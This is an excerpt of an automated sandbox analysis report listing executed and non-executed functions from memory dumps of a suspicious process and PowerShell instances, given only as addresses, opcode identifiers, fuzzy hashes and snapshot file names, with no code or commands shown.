                                                                                                                                                                          • Opcode ID: b47ba32bf53d04534af85950cf8cd8886b2183143f4630aff183fa5b3cda173a
                                                                                                                                                                          • Instruction ID: 930f42f3671a4133c6ec949d0677e35a405daad071706f5ccee2ece861f6b9c9
                                                                                                                                                                          • Opcode Fuzzy Hash: b47ba32bf53d04534af85950cf8cd8886b2183143f4630aff183fa5b3cda173a
                                                                                                                                                                          • Instruction Fuzzy Hash: 8AF0E211B0FD5E8EF7355991A8312FA3A44BF42398F22057AC59E825E2CC0E77024A92
                                                                                                                                                                          Function 00007FFD9BBB1DC1 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 46f128c5c498670a15e7a9bcf311b6824811810c17967681e153fdee4bfd3a1e
                                                                                                                                                                          • Instruction ID: c0e867a03e5a10a95e5b89acbf5eb0ddedcb823edf9d078fab9ec12fd0873949
                                                                                                                                                                          • Opcode Fuzzy Hash: 46f128c5c498670a15e7a9bcf311b6824811810c17967681e153fdee4bfd3a1e
                                                                                                                                                                          • Instruction Fuzzy Hash: 3DF0203090A20CCFDB25EF24C4A12E93BA1FF55300F0501BAF008C31A2DB79DA68CB80
                                                                                                                                                                          Function 00007FFD9BF780A4 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c4d504441f8c5b27cc754ae206f7721d3167a1ffb3c821f669730c3f161441b7
                                                                                                                                                                          • Instruction ID: f575f545d3bdfe819caa1491cbe130efe78b2467255dfdcf9b1c81779aa43025
                                                                                                                                                                          • Opcode Fuzzy Hash: c4d504441f8c5b27cc754ae206f7721d3167a1ffb3c821f669730c3f161441b7
                                                                                                                                                                          • Instruction Fuzzy Hash: B7011770F0D65D8EDBACDF1884A57A977B1FB55300F0502F9D04DD3292CA356A84CB02
                                                                                                                                                                          Function 00007FFD9BF78432 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4946793f4073aa45c94b9cf5c8f8e394b53c393d7a4f472038cd03666486e07f
                                                                                                                                                                          • Instruction ID: edec43391cfa3586ee75bc9f5e2e36f7c4025f922aa40d08a3dd059e37da4a0c
                                                                                                                                                                          • Opcode Fuzzy Hash: 4946793f4073aa45c94b9cf5c8f8e394b53c393d7a4f472038cd03666486e07f
                                                                                                                                                                          • Instruction Fuzzy Hash: E0F0623184E2C99FD716DFB088A15A97FB4EF42200B1A01F6D189C70A2C6AE564AC752
                                                                                                                                                                          Function 00007FFD9BBBCC2A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 040bb887ac8b6c8bb9f1f0f6ebdb2a8dfbf7bc7936566f0f5ec49150899814d2
                                                                                                                                                                          • Instruction ID: f17426e41731e21aaa5a16f14a577af731aa7b6718ea8096f43cf03532a212fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 040bb887ac8b6c8bb9f1f0f6ebdb2a8dfbf7bc7936566f0f5ec49150899814d2
                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0C821A0E3DA4FDB328AA48CA11A63BD0EF1331471906B5C0548B0E7D5946915CB91
                                                                                                                                                                          Function 00007FFD9BF7912A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: bb51b305f9fa8d34a2b32e6ca5905d3cf2eaad95f0f3373236396fd27a55a632
                                                                                                                                                                          • Instruction ID: 415e68a6b89aacc01a6e634927394545d66ede132bf2ce4ab15eaca7ee323269
                                                                                                                                                                          • Opcode Fuzzy Hash: bb51b305f9fa8d34a2b32e6ca5905d3cf2eaad95f0f3373236396fd27a55a632
                                                                                                                                                                          • Instruction Fuzzy Hash: 27F0C811A0D7CA5FEB325EA44CE91A53BE0DF1331071A47FAC05C871F3D558A625C301
                                                                                                                                                                          Function 00007FFD9BBB413E Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 37c724ce86483d22d8d5d93c62b03311c362803e12ff3196652cd9cb954cf90e
                                                                                                                                                                          • Instruction ID: 7a744d411018295c14259def78c647ced26c52358fcdb356f4ec1decb85c8943
                                                                                                                                                                          • Opcode Fuzzy Hash: 37c724ce86483d22d8d5d93c62b03311c362803e12ff3196652cd9cb954cf90e
                                                                                                                                                                          • Instruction Fuzzy Hash: A0F0A771F09BC84FDB55EBE494A226C3BE1EF59310B15006DD04EC72D7DE3459428740
                                                                                                                                                                          Function 00007FFD9BF71657 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 058616c0a37f0f33df9491b61a4b99de5f5dd7c5c3a60a93fd32a585b7e4de9f
                                                                                                                                                                          • Instruction ID: c8a1d32e6c47fb49ec3b2be73bc9e8861ffb0077c988e5658243d7949feabdee
                                                                                                                                                                          • Opcode Fuzzy Hash: 058616c0a37f0f33df9491b61a4b99de5f5dd7c5c3a60a93fd32a585b7e4de9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 5FD0C261F0E2894FEB360AB048B41B82A91DF2738074A06F6C1994B2E3D859AA0D9712
                                                                                                                                                                          Function 00007FFD9BBB4ACB Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2d609a392423b6af01024242b8bb6762e198c782e5ae2788d2b8367bac20bff5
                                                                                                                                                                          • Instruction ID: 8cee04d22c56fc03be23ba233236d1c5beaa62b5c1196c7ef682acb0d14508d2
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d609a392423b6af01024242b8bb6762e198c782e5ae2788d2b8367bac20bff5
                                                                                                                                                                          • Instruction Fuzzy Hash: 55D0C918B4F93F85F53846C2423023F5194BF50708F22403ED06F418F5CE5C7701AA06
                                                                                                                                                                          Function 00007FFD9BF7213B Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a9275298bb707659417054deebf1ff0bde1f806142d48fe670fecc73d6f1772f
                                                                                                                                                                          • Instruction ID: e7f2372351b957ecf3c0ce8da0e352e5392a3b8cb7c641060b8a8f26917ea07d
                                                                                                                                                                          • Opcode Fuzzy Hash: a9275298bb707659417054deebf1ff0bde1f806142d48fe670fecc73d6f1772f
                                                                                                                                                                          • Instruction Fuzzy Hash: A7D09E14B1F54B45F9794DD240F02395195EF02700E2642B9C19F439F1896EFB025202
                                                                                                                                                                          Function 00007FFD9BF79C2B Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                                                          • Instruction ID: 767608702f9174a2ae008c2f8d9bc33895dda0c6fa603b735e9b5a70149b3899
                                                                                                                                                                          • Opcode Fuzzy Hash: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 03D09220B0E60FA5FA785E8141F827965D0EF00700E62C2BDD05F478F1C92AFB016212
                                                                                                                                                                          Function 00007FFD9BBB3FDC Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d3e7f0d571770496aca5846ff91f58bf422d30e6b570c21a9c9862d52776d6dd
                                                                                                                                                                          • Instruction ID: 9eff768e9f8aaba398671570518c29c2691a8a64f03db7d3e601f0802c271621
                                                                                                                                                                          • Opcode Fuzzy Hash: d3e7f0d571770496aca5846ff91f58bf422d30e6b570c21a9c9862d52776d6dd
                                                                                                                                                                          • Instruction Fuzzy Hash: C5C08C00F0F3E717EB3103F808B607D0F602F2B30874A0572C446850E3E88C2E419B10

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 00007FFD9B9EDDAD Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f65c7eafa5d50850e5dc53c76d0d0e40b7fc1558fce5ce2f668b206546f8da5f
                                                                                                                                                                          • Instruction ID: 68f77e8475ee75066086bee0e13880547690b813ec848be257b3782466697787
                                                                                                                                                                          • Opcode Fuzzy Hash: f65c7eafa5d50850e5dc53c76d0d0e40b7fc1558fce5ce2f668b206546f8da5f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7A81A130A08A8D8FDBA8DF18C855BE977E1FF59310F10412AE84DC7291CB74AA45CB81
                                                                                                                                                                          Function 00007FFD9BBB88FA Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 2_^$2_^$2_^$2_^$2_^
                                                                                                                                                                          • API String ID: 0-2570888024
                                                                                                                                                                          • Opcode ID: d35f8f08c1e2bc77573b7c6a2eb72e325b75733a653b01f24f48f48bf206b09d
                                                                                                                                                                          • Instruction ID: 045a43eed443607821c2f92709158ff1ccb4ccee3578e43208b98c0af491efb2
                                                                                                                                                                          • Opcode Fuzzy Hash: d35f8f08c1e2bc77573b7c6a2eb72e325b75733a653b01f24f48f48bf206b09d
                                                                                                                                                                          • Instruction Fuzzy Hash: B0214893B4B69AABFF255E558CE15962BD0FF3031C71D10B0CAEC8B183F915651A8B82

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00007FFD9BAE6605 Relevance: .4, Instructions: 445COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2802198400.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_7ffd9bae0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 713290308664ca059f2177713eb81a4ba89734400f41e14ca4228e8df348d9df
                                                                                                                                                                          • Instruction ID: 819c5025f298d450fb43e1281f346b8a69316e816d0f37512e565f653fe8f940
                                                                                                                                                                          • Opcode Fuzzy Hash: 713290308664ca059f2177713eb81a4ba89734400f41e14ca4228e8df348d9df
                                                                                                                                                                          • Instruction Fuzzy Hash: D3D15732A1FA8E0FEBA5AB6C48655B57BE0EF16314B0905FED09DC70E3DA58AC04C341
                                                                                                                                                                          Function 00007FFD9BA19D06 Relevance: .2, Instructions: 228COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2794870915.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_7ffd9ba10000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 938b830aca5b71dfdd47f8cfc7cffa4b8c2c604260fa53dc17d7e3a5743dd265
                                                                                                                                                                          • Instruction ID: 8467362091d2ef5b07145767024580bfd2a7804c714a6f7e064228ec165e6d1e
                                                                                                                                                                          • Opcode Fuzzy Hash: 938b830aca5b71dfdd47f8cfc7cffa4b8c2c604260fa53dc17d7e3a5743dd265
                                                                                                                                                                          • Instruction Fuzzy Hash: A2016D3140D7CC8FCB969F6888294A47FF0EF16210B0A41E7D489CB072D7699948C782
                                                                                                                                                                          Function 00007FFD9B8FED40 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2787813390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_7ffd9b8fd000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: dff68471cebf823d82cf80cd01a3e94572e1e19d43784dbbdb54158bfde8c095
                                                                                                                                                                          • Instruction ID: 43fc0c5fb90b2e5a18d40b916ee9b33695dc372dfa22939de88b239f70e7d752
                                                                                                                                                                          • Opcode Fuzzy Hash: dff68471cebf823d82cf80cd01a3e94572e1e19d43784dbbdb54158bfde8c095
                                                                                                                                                                          • Instruction Fuzzy Hash: 9541157050EBC44FE7669B2C98519523FF0EF5B321B1A01DFD088CB5A3D629AC46C7A2
                                                                                                                                                                          Function 00007FFD9BA197A8 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2794870915.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_7ffd9ba10000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0d5ff5b45b0f9d5c8f1f16eb6a28007977486febe0697635c8b7fd960f7d2950
                                                                                                                                                                          • Instruction ID: af03f5c398653ad6fa70a07f5ff24954afe2c24b238633b45dbe789e9d9a8726
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d5ff5b45b0f9d5c8f1f16eb6a28007977486febe0697635c8b7fd960f7d2950
                                                                                                                                                                          • Instruction Fuzzy Hash: 99318131A1CA4C8FDB5C9B5CA84A6A97BE0FB99321F00422FE44993251CA71A855CBC2
                                                                                                                                                                          Function 00007FFD9BA1A65A Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2794870915.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_7ffd9ba10000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d69d1dbde6fb050ddb15812ba7b838f7ccc330fbda12d31de5c2ffce147662d3
                                                                                                                                                                          • Instruction ID: 1ad34e72e33f2fbcac9370ae4d7102a1b76099cd5a6cbdf7e15bed519d85d8a3
                                                                                                                                                                          • Opcode Fuzzy Hash: d69d1dbde6fb050ddb15812ba7b838f7ccc330fbda12d31de5c2ffce147662d3
                                                                                                                                                                          • Instruction Fuzzy Hash: E6212731A0CB4C4FDB58DFAC984A6E97BF0EB96320F04816FD44DC7152C6749819CB91
                                                                                                                                                                          Function 00007FFD9BA133B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2794870915.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_7ffd9ba10000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                          • Instruction ID: a55e2f9db695d2b793887dbbac947a38dbbc7038fa19d01ed2a818b736cadb46
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                          • Instruction Fuzzy Hash: 0201677121CB0C4FDB48EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E882CB45
                                                                                                                                                                          Function 00007FFD9BAE414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2802198400.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_7ffd9bae0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: eb1ec59f2b866e62f2de06e0d14eee2004c575b0a9b3c66cfd2e4f619d760dfc
                                                                                                                                                                          • Instruction ID: 67fa2492377b1bc2a4a09ca6a274f4dd7e8ad06cae67166cf7b052172f26d0e2
                                                                                                                                                                          • Opcode Fuzzy Hash: eb1ec59f2b866e62f2de06e0d14eee2004c575b0a9b3c66cfd2e4f619d760dfc
                                                                                                                                                                          • Instruction Fuzzy Hash: E8F09A32B0E9098FDB68EB4CE4518A873E4EF5932071600BBE16DC75B3CA25EC408741
                                                                                                                                                                          Function 00007FFD9BAE4400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2802198400.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_7ffd9bae0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c2263dadcc79f092e54f0cde6757628ec0a163a9746df501ef987dd9d747fdfe
                                                                                                                                                                          • Instruction ID: 64a795e4ed0b53610db387ec15f7bec173df60141e7fcfad9367823f7a254997
                                                                                                                                                                          • Opcode Fuzzy Hash: c2263dadcc79f092e54f0cde6757628ec0a163a9746df501ef987dd9d747fdfe
                                                                                                                                                                          • Instruction Fuzzy Hash: F8F08232B0E5498FDB64EB5CE4618A877E0FF4532475600BAE15DCB4B3DA25EC50C751
                                                                                                                                                                          Function 00007FFD9BAE41D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2802198400.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_7ffd9bae0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction ID: 64e0a4324ac2068c27c3aee3e024be706c3f9e484cc2c970fdfee4890e305e95
                                                                                                                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction Fuzzy Hash: 86E01A31B0C8088FDA78DB4CE0519ADB3E5EB98321B1201BBE14EC7571CA22ED518B80

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00007FFD9BAD6605 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2810937253.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: aedb7a1a88a009240e319a7730ca8eb8508c837f7ca063044d1d217da87aa141
                                                                                                                                                                          • Instruction ID: 411721d7d71f080e246f78a41dea102e16061b42482a0b22bf3845449f86c9f8
                                                                                                                                                                          • Opcode Fuzzy Hash: aedb7a1a88a009240e319a7730ca8eb8508c837f7ca063044d1d217da87aa141
                                                                                                                                                                          • Instruction Fuzzy Hash: 39D15831B0FA8E4FEBA59B6C48655B97BE0EF96210B0902FED45DC70E3DA58AD01C341
                                                                                                                                                                          Function 00007FFD9BA0A0A5 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 23d0c998d3b097a16a76a0efaffb1727c2496305bd01e1de497b6baba86623c0
                                                                                                                                                                          • Instruction ID: 66a23cc44e52b75da28a984a726eee66f994bae915971613e100fbe7415c36fa
                                                                                                                                                                          • Opcode Fuzzy Hash: 23d0c998d3b097a16a76a0efaffb1727c2496305bd01e1de497b6baba86623c0
                                                                                                                                                                          • Instruction Fuzzy Hash: C0315022A0E3DA4FD713AF7898B54D43FA0AF13214B1A01F3D899CF0A3DA591C49C762
                                                                                                                                                                          Function 00007FFD9BA09D28 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5428300f24bcf0b02d88e0c2dffd9cfbb83a4ea36748404a130a0ef80ee7a92f
